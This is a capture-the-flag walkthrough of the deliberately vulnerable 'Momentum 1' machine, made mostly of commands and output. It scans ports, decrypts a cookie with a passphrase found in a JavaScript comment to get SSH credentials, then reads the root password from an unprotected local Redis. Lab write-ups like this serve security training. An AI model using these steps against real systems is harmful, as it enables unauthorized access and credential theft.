Momentum 1
Port recognition withnmap
┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV momentum.vuln --script=http-enum
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-28 19:48 EST
Nmap scan report for momentum.vuln (10.0.2.239)
Host is up (0.000061s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
| /img/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_ /manual/: Potentially interesting folder
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:FC:30:16 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.80 seconds
Nmap scan with http-enum script reveals a few routes
┌──(root@ghost)-[/home/ghost]
└─# curl http://momentum.vuln/js/main.js
function viewDetails(str) {
window.location.href = "opus-details.php?id="+str;
}
/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/
Visit /js/ you will see main.js
cookie:U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt
After visiting http://momentum.vuln/opus-details.php this cookie will be set
┌──(root@ghost)-[/home/ghost]
└─# cat dcrypt.js
var CryptoJS = require("crypto-js");
var encrypted = "U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt";
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
Complete the code to decrypt cookie value
┌──(root@ghost)-[/home/ghost]
└─# nodejs dcrypt.js
auxerre-alienum##
We found some credentials
┌──(root@ghost)-[/home/ghost]
└─# ssh auxerre@momentum.vuln
auxerre@momentum.vuln's password:
Linux Momentum 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 22 08:47:31 2021
auxerre@Momentum:~$ cat user.txt
[ Momentum - User Owned ]
---------------------------------------
flag : 84157165c30ad34d18945b647ec7f647
---------------------------------------
We log into ssh as auxerre user with auxerre-alienum## password
auxerre@Momentum:~$ ss -tnl
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 127.0.0.1:6379 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 [::1]:6379 [::]:*
LISTEN 0 128 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*
Found a local redis database
auxerre@Momentum:~$ redis-cli
127.0.0.1:6379> keys *
1) "rootpass"
127.0.0.1:6379> get rootpass
"m0mentum-al1enum##"
127.0.0.1:6379> exit
auxerre@Momentum:~$ su root
Password:
root@Momentum:/home/auxerre# cat /root/root.txt
[ Momentum - Rooted ]
---------------------------------------
Flag : 658ff660fdac0b079ea78238e5996e40
---------------------------------------
by alienum with <3